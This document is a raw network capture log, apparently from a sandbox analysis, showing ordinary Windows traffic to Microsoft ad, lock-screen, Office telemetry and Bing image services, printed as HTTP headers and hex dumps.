2024-12-07 09:51:17 UTC	814	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 3892 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: ijRyqk9HMIpoE1xrYopTD00D0d2XbXN9AydeNI4GYGcl2DQ4t7mjyxRtI0i8y7QPx8oK69BI19H3uDUtShGbFoIvBlpcGtft+juXbif3gMpH1H8dUEamKYXVGtie4VfOeoTcPDyiUsTzcpiWStlDa5tH9vydNQXrt+746mU1t8UiJeVuUjPE4n4s8WSF6/Ia/JEQEi4ql81kO9mb3mIL/94H5Y26nCkXA19Q3GYIyhGwmoRB1zJUbXspQh5YAH2QRbf40CdrRegxzN4l4KWrLSXVz9iOXp6QtwxX2USGc9XKlNQAG+JOijbMhBO0JhRO/lwMB/MaMmL11yaYiyfKBw== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 07 Dec 2024 09:51:17 GMT Connection: close
2024-12-07 09:51:17 UTC	3892	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 53 75 67 67 65 73 74 69 6f 6e 73 4f 6e 53 74 61 72 74 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 7d 2c 5c 22 70 72 6f 70 65 72 74 69 65 73 5c 22 3a 7b 7d 2c 5c 22 74 72 61 63 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"SuggestionsOnStart\",\"propertyManifest\":{},\"properties\":{},\"trac

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49717	20.199.58.43	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:16 UTC	2604	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241207T095113Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=b733a0c8f274419b8bb10c2db25bfff4&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=617973&metered=false&nettype=ethernet&npid=sc-338387&oemName=lubufd%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=lubufd20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=617973&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1& [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZyMFkueVF6YQcCvSNBsYpIs4Qd9uYLd1XThPDga/VMIyCy+eMekKh4VSodnFDQ4n9lrkswnaNY8GYQ0LaPFIJzw8cdDovegxQEKXl3uwbQm7avPmaE22/9yfAjtJ4cL7TShgIQ87Ff8bCnRMjTRO0qGPO/W5zq3MPbRDpKMWsFHc5aDZtEbzuZQGnhsSTStKn842VbaQufNbSd6CdSpqbTxIG43Ig/Eeli/gDioys1MWFcaJqBXmLIogUf3OMZs+D0HT1mDwJTd/tcIfn07Ch6BOteR2+4D6lHkPYbyebVpVVGLe8Kh68xjqfktCQLZ9U0Rh7FfPDkLeF1AQDY7HWEQZgAAELvB9khYUktYC0gLd8ASgH6wAW+Pu+FJ/y3GtjMKW1gkUDUXNmQyQ/i1ijgYr1PAYLWHvCbbCNeSNFROlpoxJ+tjtLRfHCFhWVTMy2fdvAkF7XrzG5KCbs8arX4gUeyy890SjhCZJW3sZScGJEhj1V/VDPnpFsrHjgWdZT+g1n11Dclm5ZDUuKklw0SBsjxerjsLpMokLwUA1f5heiBTKw6cXOpu8cOeeNFjCn7oOt+rd4MoMVuW27Az6B3niPuM8EplRl4EDlX12y1OUSE92MXgSoOvapsw8BTUc5+4lbkyXrG6iPfyW8Jg4fRwFdLVV2aUnuGrw8a3BOQmzO7RZrHOLrPV2pdxCjcC6A59cjYEvikJHBycKMqpdZZiGM4rrgCV4YNPFh4SE+82pbzg3hkebn4ChYs7BiDpWq2PwmR137spkVGyusnf8EKexZPvkev4UH2YuI34Fuhcn0LhLyiN6wC8OX7WsGFimLguB2r+nwV5tRi/TjR+ogoMXP2MYzs3iqeg+v9jK1lHhuHTBwFtek9E6rJEqULB+HiBn4Tv0rKe8PDsvKY5KaTlUlWtylYFbndBiTjf/XzLJCjkwQfIZdgB&p= Cache-Control: no-cache MS-CV: w2jGzEZSUUq2aGGz.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-12-07 09:51:17 UTC	815	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 23552 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: tA9H6xa8Fs0InYHi+8Uv+EAmAA2EGTz9OfUgrA3kuXC2X1HOv1/Deau1piItCW5ZH2MJ9pw4Tam8l0LTYmCEdkhNkUUnxG0LHxzkNw7BaZnv5YuVr3lTrQp12lKNaSEQOuOKqm3umRcw122oxlUYuughbbTnsOOVaXfxeelahS8yKiS/QG9UMtv5Z6DGPctmgavh+SEpIAvpGJ8Vs08lr8h55KL/Hj2nVKN1nDolXoy6WYw1PybzfxXrQJ3D4PM1KMAnGxYmAk4ssaJx4PJ+haiN4utDwo8u9ks8cdzvlljkS3FK3FxkHTzC9wBlbnwXS3DoEqD2g/z3k7dp//1ljg== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 07 Dec 2024 09:51:16 GMT Connection: close
2024-12-07 09:51:17 UTC	15569	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 4c 6f 63 6b 53 63 72 65 65 6e 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6c 61 6e 64 73 63 61 70 65 49 6d 61 67 65 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 69 6d 61 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"LockScreen\",\"propertyManifest\":{\"landscapeImage\":{\"type\":\"ima
2024-12-07 09:51:17 UTC	7983	IN	Data Raw: 5c 22 3a 5c 22 74 78 74 5c 22 2c 5c 22 74 78 5c 22 3a 5c 22 55 32 56 68 63 6d 4e 6f 51 57 51 6a 4f 44 55 77 4d 44 59 31 4e 44 63 78 4d 44 67 79 4d 54 63 6a 4d 6a 4d 7a 4e 6a 67 77 4e 54 67 77 4e 7a 41 7a 4e 44 59 7a 4e 51 3d 3d 5c 22 7d 2c 5c 22 5f 66 6c 69 67 68 74 5c 22 3a 5c 22 5c 22 7d 7d 22 7d 2c 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 4c 6f Data Ascii: \":\"txt\",\"tx\":\"U2VhcmNoQWQjODUwMDY1NDcxMDgyMTcjMjMzNjgwNTgwNzAzNDYzNQ==\"},\"_flight\":\"\"}}"},{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"Lo

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.6	49718	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:20 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:20 UTC	471	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:20 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Thu, 05 Dec 2024 15:18:57 GMT ETag: "0x8DD1540234F33E7" x-ms-request-id: 1f1786e0-601e-0050-7103-482c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095120Z-r1cf579d778xq4f9hC1EWRx41g00000001y0000000000h5s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:20 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-12-07 09:51:20 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-12-07 09:51:20 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49720	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:20 UTC	346	OUT	GET /th?id=OADD2.10239381714323_11S06446Z442STKF6&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-07 09:51:21 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 621702 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: BE6A422FA08A429BA0488C6CE7AA2E6F Ref B: EWR30EDGE0818 Ref C: 2024-12-07T09:51:21Z Date: Sat, 07 Dec 2024 09:51:20 GMT Connection: close
2024-12-07 09:51:21 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1c 98 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 32 3a 32 39 20 30 39 3a 31 31 3a 30 35 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 